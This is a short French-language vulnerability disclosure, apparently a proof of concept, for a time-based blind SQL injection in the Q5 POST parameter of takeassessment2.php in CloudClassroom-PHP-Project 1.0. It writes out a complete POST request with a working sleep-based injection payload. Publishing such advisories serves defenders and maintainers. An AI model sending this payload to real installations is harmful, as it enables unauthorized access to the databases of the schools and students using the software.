
Preuve de concept pour une vulnérabilité d'injection SQL aveugle basée sur le temps dans le point d'accès takeassessment2.php de CloudClassroom-PHP-Project 1.0, démontrant une exploitation à distance via une requête POST conçue.
Une vulnérabilité d'injection SQL existe dans le point de terminaison takeassessment2.php de CloudClassroom-PHP-Project 1.0, où le paramètre POST Q5 est directement intégré dans des instructions SQL sans assainissement.
Type de vulnérabilité :
Injection SQL
Vendeur du produit :
https://github.com/mathurvishal/CloudClassroom-PHP-Project
Base de code du produit affecté :
https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0 - https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0
Composant affecté :
takeassessment2.php, paramètre POST Q5, logique de requête SQL
Vecteurs d'attaque :
Pour exploiter cette vulnérabilité, un attaquant soumet une requête POST malveillante à /CloudClassroom-PHP-Project-master/takeassessment2.php avec une charge utile dans le paramètre Q5 qui provoque un délai temporel dans le traitement SQL (SQLi aveugle basée sur le temps).
Requête POST :
POST /CloudClassroom-PHP-Project-master/takeassessment2.php?exid=4 HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded
Q1=555&Q2=555&Q3=555&Q4=555&Q5=5550'XOR(555*if(now()=sysdate(),sleep(6),0))XOR'Z&done= Cela provoque un délai de 6 secondes dans la réponse, confirmant la vulnérabilité.
Référence :
https://owasp.org/www-community/attacks/SQL_Injection
Découvreur : saurabh solanki